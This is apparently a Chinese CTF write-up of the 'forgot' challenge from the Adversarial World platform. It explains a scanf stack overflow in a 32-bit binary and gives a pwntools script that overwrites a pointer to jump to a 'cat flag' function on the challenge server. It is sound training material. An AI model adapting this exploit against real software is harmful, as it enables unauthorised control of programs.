攻防世界2

樊少泽2024-10-13 22:21

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码 
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
路由侠内网穿透.10 分钟前
外部访问 Python 搭建的 HTTP 服务器
运维·服务器·网络·网络协议·http·远程工作
BG8EQB23 分钟前
Docker 极简入门:从零到实践的全攻略
运维·docker·容器
秃秃秃秃哇23 分钟前
C语言实现循环链表demo
linux·c语言·链表
杰克逊的日记23 分钟前
MPLS(多协议标签交换)
运维·网络·mlps
雾岛听风眠29 分钟前
串口通信代码的一些解释
linux·运维·服务器
怀旧,32 分钟前
【Linux系统编程】8. 进程的概念(下)
linux·运维·服务器
路人甲ing..35 分钟前
Ubuntu怎么安装tar.gz (android-studio为例)
linux·ubuntu·kotlin·android studio
福尔摩斯张38 分钟前
二维数组详解:定义、初始化与实战
linux·开发语言·数据结构·c++·算法·排序算法
阿沁QWQ40 分钟前
Reactor反应堆模式
linux·运维·服务器
No.Ada1 小时前
头歌-基于 socket 的网络编程
linux·服务器·网络
热门推荐
01GitHub 镜像站点02Google Antigravity:无法登录?早期错误、登录修复和用户反馈指南03UV安装并设置国内源04BongoCat - 跨平台键盘猫动画工具05今天 Cloudflare 全球事故,连 GPT 和你的网站都一起“掉线”了06【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08Linux下V2Ray安装配置指南09全球最强模型Grok4,国内已可免费使用!(附教程)1046个Nano-banana 精选提示词,持续更新中